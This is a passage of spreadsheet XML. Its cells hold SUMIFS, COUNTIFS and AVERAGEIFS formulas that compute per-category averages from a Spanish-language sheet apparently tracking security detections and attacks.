      <c r="AB164" s="501">
        <f>(
    SUMIFS(
        '(B) - Detecciones - Ataques'!$BS$3:$BS$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, AB$131
    ) +
    SUMIFS(
        '(B) - Detecciones - Ataques'!$BS$3:$BS$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; AB$131 &amp; "*"
    )
) / (
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, AB$131
    ) +
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; AB$131 &amp; "*"
    )
)
</f>
        <v>1.5625</v>
      </c>
      <c r="AC164" s="501">
        <f>(
    SUMIFS(
        '(B) - Detecciones - Ataques'!$BS$3:$BS$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, AC$131
    ) +
    SUMIFS(
        '(B) - Detecciones - Ataques'!$BS$3:$BS$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; AC$131 &amp; "*"
    )
) / (
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, AC$131
    ) +
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; AC$131 &amp; "*"
    )
)
</f>
        <v>2.4</v>
      </c>
      <c r="AD164" s="501">
        <f>(
    SUMIFS(
        '(B) - Detecciones - Ataques'!$BS$3:$BS$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, AD$131
    ) +
    SUMIFS(
        '(B) - Detecciones - Ataques'!$BS$3:$BS$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; AD$131 &amp; "*"
    )
) / (
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, AD$131
    ) +
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; AD$131 &amp; "*"
    )
)
</f>
        <v>0.05639657327</v>
      </c>
      <c r="AE164" s="501">
        <f>(
    SUMIFS(
        '(B) - Detecciones - Ataques'!$BS$3:$BS$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, AE$131
    ) +
    SUMIFS(
        '(B) - Detecciones - Ataques'!$BS$3:$BS$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; AE$131 &amp; "*"
    )
) / (
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, AE$131
    ) +
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; AE$131 &amp; "*"
    )
)
</f>
        <v>1.6</v>
      </c>
      <c r="AF164" s="502">
        <f>(
    SUMIFS(
        '(B) - Detecciones - Ataques'!$BS$3:$BS$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, AF$131
    ) +
    SUMIFS(
        '(B) - Detecciones - Ataques'!$BS$3:$BS$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; AF$131 &amp; "*"
    )
) / (
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, AF$131
    ) +
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; AF$131 &amp; "*"
    )
)
</f>
        <v>0.03272727273</v>
      </c>
      <c r="AG164" s="271"/>
      <c r="AH164" s="352" t="s">
        <v>2588</v>
      </c>
      <c r="AI164" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$BS$3:$BS$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, AI$131)
</f>
        <v>0.4846457838</v>
      </c>
      <c r="AJ164" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$BS$3:$BS$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, AJ$131)
</f>
        <v>1</v>
      </c>
      <c r="AK164" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$BS$3:$BS$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, AK$131)
</f>
        <v>0.25</v>
      </c>
      <c r="AL164" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$BS$3:$BS$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, AL$131)
</f>
        <v>0</v>
      </c>
      <c r="AM164" s="533" t="s">
        <v>12</v>
      </c>
      <c r="AN164" s="533" t="s">
        <v>12</v>
      </c>
      <c r="AO164" s="533" t="s">
        <v>12</v>
      </c>
      <c r="AP164" s="533" t="s">
        <v>12</v>
      </c>
      <c r="AQ164" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$BS$3:$BS$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, AQ$131)
</f>
        <v>0.007894736842</v>
      </c>
      <c r="AR164" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$BS$3:$BS$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, AR$131)
</f>
        <v>0.6666666667</v>
      </c>
      <c r="AS164" s="533" t="s">
        <v>12</v>
      </c>
      <c r="AT164" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$BS$3:$BS$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, AT$131)
</f>
        <v>3</v>
      </c>
      <c r="AU164" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$BS$3:$BS$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, AU$131)
</f>
        <v>2</v>
      </c>
      <c r="AV164" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$BS$3:$BS$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, AV$131)
</f>
        <v>1</v>
      </c>
      <c r="AW164" s="533" t="s">
        <v>12</v>
      </c>
      <c r="AX164" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$BS$3:$BS$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, AX$131)
</f>
        <v>0.5</v>
      </c>
      <c r="AY164" s="534" t="s">
        <v>12</v>
      </c>
      <c r="AZ164" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$BS$3:$BS$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, AZ$131)
</f>
        <v>0</v>
      </c>
      <c r="BA164" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$BS$3:$BS$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BA$131)
</f>
        <v>0</v>
      </c>
      <c r="BB164" s="534" t="s">
        <v>12</v>
      </c>
      <c r="BC164" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$BS$3:$BS$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BC$131)
</f>
        <v>0.3333333333</v>
      </c>
      <c r="BD164" s="533" t="s">
        <v>12</v>
      </c>
      <c r="BE164" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$BS$3:$BS$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BE$131)
</f>
        <v>0</v>
      </c>
      <c r="BF164" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$BS$3:$BS$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BF$131)
</f>
        <v>0</v>
      </c>
      <c r="BG164" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$BS$3:$BS$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BG$131)
</f>
        <v>0</v>
      </c>
      <c r="BH164" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$BS$3:$BS$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BH$131)
</f>
        <v>792</v>
      </c>
      <c r="BI164" s="533" t="s">
        <v>12</v>
      </c>
      <c r="BJ164" s="533" t="s">
        <v>12</v>
      </c>
      <c r="BK164" s="533" t="s">
        <v>12</v>
      </c>
      <c r="BL164" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$BS$3:$BS$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BL$131)
</f>
        <v>0</v>
      </c>
      <c r="BM164" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$BS$3:$BS$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BM$131)
</f>
        <v>9.359348739</v>
      </c>
      <c r="BN164" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$BS$3:$BS$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BN$131)
</f>
        <v>788.3911657</v>
      </c>
      <c r="BO164" s="533" t="s">
        <v>12</v>
      </c>
      <c r="BP164" s="533" t="s">
        <v>12</v>
      </c>
      <c r="BQ164" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$BS$3:$BS$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BQ$131)
</f>
        <v>0</v>
      </c>
      <c r="BR164" s="533" t="s">
        <v>12</v>
      </c>
      <c r="BS164" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$BS$3:$BS$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BS$131)
</f>
        <v>0</v>
      </c>
      <c r="BT164" s="533" t="s">
        <v>12</v>
      </c>
      <c r="BU164" s="533" t="s">
        <v>12</v>
      </c>
      <c r="BV164" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$BS$3:$BS$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BV$131)
</f>
        <v>0</v>
      </c>
      <c r="BW164" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$BS$3:$BS$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BW$131)
</f>
        <v>0</v>
      </c>
      <c r="BX164" s="533" t="s">
        <v>12</v>
      </c>
      <c r="BY164" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$BS$3:$BS$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BY$131)
</f>
        <v>0.0625</v>
      </c>
      <c r="BZ164" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$BS$3:$BS$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BZ$131)
</f>
        <v>0.162601626</v>
      </c>
      <c r="CA164" s="534" t="s">
        <v>12</v>
      </c>
      <c r="CB164" s="533" t="s">
        <v>12</v>
      </c>
      <c r="CC164" s="534" t="s">
        <v>12</v>
      </c>
      <c r="CD164" s="533" t="s">
        <v>12</v>
      </c>
      <c r="CE164" s="533" t="s">
        <v>12</v>
      </c>
      <c r="CF164" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$BS$3:$BS$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, CF$131)
</f>
        <v>0</v>
      </c>
      <c r="CG164" s="533" t="s">
        <v>12</v>
      </c>
      <c r="CH164" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$BS$3:$BS$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, CH$131)
</f>
        <v>1</v>
      </c>
      <c r="CI164" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$BS$3:$BS$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, CI$131)
</f>
        <v>0</v>
      </c>
      <c r="CJ164" s="533" t="s">
        <v>12</v>
      </c>
      <c r="CK164" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$BS$3:$BS$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, CK$131)
</f>
        <v>8</v>
      </c>
      <c r="CL164" s="533" t="s">
        <v>12</v>
      </c>
      <c r="CM164" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$BS$3:$BS$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, CM$131)
</f>
        <v>1.5</v>
      </c>
      <c r="CN164" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$BS$3:$BS$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, CN$131)
</f>
        <v>0</v>
      </c>
      <c r="CO164" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$BS$3:$BS$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, CO$131)
</f>
        <v>0.25</v>
      </c>
      <c r="CP164" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$BS$3:$BS$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, CP$131)
</f>
        <v>11.5</v>
      </c>
      <c r="CQ164" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$BS$3:$BS$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, CQ$131)
</f>
        <v>0</v>
      </c>
      <c r="CR164" s="533" t="s">
        <v>12</v>
      </c>
      <c r="CS164" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$BS$3:$BS$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, CS$131)
</f>
        <v>0.1399934292</v>
      </c>
      <c r="CT164" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$BS$3:$BS$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, CT$131)
</f>
        <v>0.001996007984</v>
      </c>
      <c r="CU164" s="533" t="s">
        <v>12</v>
      </c>
      <c r="CV164" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$BS$3:$BS$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, CV$131)
</f>
        <v>0</v>
      </c>
      <c r="CW164" s="533" t="s">
        <v>12</v>
      </c>
      <c r="CX164" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$BS$3:$BS$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, CX$131)
</f>
        <v>0</v>
      </c>
      <c r="CY164" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$BS$3:$BS$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, CY$131)
</f>
        <v>1.5</v>
      </c>
      <c r="CZ164" s="533" t="s">
        <v>12</v>
      </c>
      <c r="DA164" s="533" t="s">
        <v>12</v>
      </c>
      <c r="DB164" s="533" t="s">
        <v>12</v>
      </c>
      <c r="DC164" s="533" t="s">
        <v>12</v>
      </c>
      <c r="DD164" s="533" t="s">
        <v>12</v>
      </c>
      <c r="DE164" s="533" t="s">
        <v>12</v>
      </c>
      <c r="DF164" s="533" t="s">
        <v>12</v>
      </c>
      <c r="DG164" s="533" t="s">
        <v>12</v>
      </c>
      <c r="DH164" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$BS$3:$BS$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, DH$131)
</f>
        <v>0.04</v>
      </c>
      <c r="DI164" s="533" t="s">
        <v>12</v>
      </c>
      <c r="DJ164" s="519">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$BS$3:$BS$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, DJ$131)
</f>
        <v>0.09090909091</v>
      </c>
      <c r="DK164" s="271"/>
    </row>
    <row r="165">
      <c r="J165" s="277"/>
      <c r="K165" s="512"/>
      <c r="L165" s="512"/>
      <c r="M165" s="512"/>
      <c r="N165" s="512"/>
      <c r="O165" s="278"/>
      <c r="Q165" s="271"/>
      <c r="R165" s="352" t="s">
        <v>2589</v>
      </c>
      <c r="S165" s="501">
        <f>(
    SUMIFS(
        '(B) - Detecciones - Ataques'!$DI$3:$DI$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, S$131
    ) +
    SUMIFS(
        '(B) - Detecciones - Ataques'!$DI$3:$DI$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; S$131 &amp; "*"
    )
) / (
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, S$131
    ) +
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; S$131 &amp; "*"
    )
)
</f>
        <v>0.5851941748</v>
      </c>
      <c r="T165" s="501">
        <f>(
    SUMIFS(
        '(B) - Detecciones - Ataques'!$DI$3:$DI$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, T$131
    ) +
    SUMIFS(
        '(B) - Detecciones - Ataques'!$DI$3:$DI$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; T$131 &amp; "*"
    )
) / (
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, T$131
    ) +
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; T$131 &amp; "*"
    )
)
</f>
        <v>0</v>
      </c>
      <c r="U165" s="501">
        <f>(
    SUMIFS(
        '(B) - Detecciones - Ataques'!$DI$3:$DI$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, U$131
    ) +
    SUMIFS(
        '(B) - Detecciones - Ataques'!$DI$3:$DI$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; U$131 &amp; "*"
    )
) / (
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, U$131
    ) +
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; U$131 &amp; "*"
    )
)
</f>
        <v>1.409649123</v>
      </c>
      <c r="V165" s="501">
        <f>(
    SUMIFS(
        '(B) - Detecciones - Ataques'!$DI$3:$DI$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, V$131
    ) +
    SUMIFS(
        '(B) - Detecciones - Ataques'!$DI$3:$DI$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; V$131 &amp; "*"
    )
) / (
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, V$131
    ) +
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; V$131 &amp; "*"
    )
)
</f>
        <v>4.46875</v>
      </c>
      <c r="W165" s="532">
        <f>(
    SUMIFS(
        '(B) - Detecciones - Ataques'!$DI$3:$DI$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, W$131
    ) +
    SUMIFS(
        '(B) - Detecciones - Ataques'!$DI$3:$DI$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; W$131 &amp; "*"
    )
) / (
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, W$131
    ) +
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; W$131 &amp; "*"
    )
)
</f>
        <v>14</v>
      </c>
      <c r="X165" s="501">
        <f>(
    SUMIFS(
        '(B) - Detecciones - Ataques'!$DI$3:$DI$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, X$131
    ) +
    SUMIFS(
        '(B) - Detecciones - Ataques'!$DI$3:$DI$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; X$131 &amp; "*"
    )
) / (
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, X$131
    ) +
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; X$131 &amp; "*"
    )
)
</f>
        <v>0.1428571429</v>
      </c>
      <c r="Y165" s="501">
        <f>(
    SUMIFS(
        '(B) - Detecciones - Ataques'!$DI$3:$DI$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, Y$131
    ) +
    SUMIFS(
        '(B) - Detecciones - Ataques'!$DI$3:$DI$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; Y$131 &amp; "*"
    )
) / (
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, Y$131
    ) +
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; Y$131 &amp; "*"
    )
)
</f>
        <v>159.6666667</v>
      </c>
      <c r="Z165" s="501">
        <f>(
    SUMIFS(
        '(B) - Detecciones - Ataques'!$DI$3:$DI$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, Z$131
    ) +
    SUMIFS(
        '(B) - Detecciones - Ataques'!$DI$3:$DI$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; Z$131 &amp; "*"
    )
) / (
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, Z$131
    ) +
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; Z$131 &amp; "*"
    )
)
</f>
        <v>8341.880148</v>
      </c>
      <c r="AA165" s="501">
        <f>(
    SUMIFS(
        '(B) - Detecciones - Ataques'!$DI$3:$DI$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, AA$131
    ) +
    SUMIFS(
        '(B) - Detecciones - Ataques'!$DI$3:$DI$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; AA$131 &amp; "*"
    )
) / (
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, AA$131
    ) +
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; AA$131 &amp; "*"
    )
)
</f>
        <v>1.599046279</v>
      </c>
      <c r="AB165" s="501">
        <f>(
    SUMIFS(
        '(B) - Detecciones - Ataques'!$DI$3:$DI$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, AB$131
    ) +
    SUMIFS(
        '(B) - Detecciones - Ataques'!$DI$3:$DI$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; AB$131 &amp; "*"
    )
) / (
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, AB$131
    ) +
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; AB$131 &amp; "*"
    )
)
</f>
        <v>22.359375</v>
      </c>
      <c r="AC165" s="501">
        <f>(
    SUMIFS(
        '(B) - Detecciones - Ataques'!$DI$3:$DI$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, AC$131
    ) +
    SUMIFS(
        '(B) - Detecciones - Ataques'!$DI$3:$DI$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; AC$131 &amp; "*"
    )
) / (
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, AC$131
    ) +
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; AC$131 &amp; "*"
    )
)
</f>
        <v>5.4</v>
      </c>
      <c r="AD165" s="501">
        <f>(
    SUMIFS(
        '(B) - Detecciones - Ataques'!$DI$3:$DI$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, AD$131
    ) +
    SUMIFS(
        '(B) - Detecciones - Ataques'!$DI$3:$DI$139,
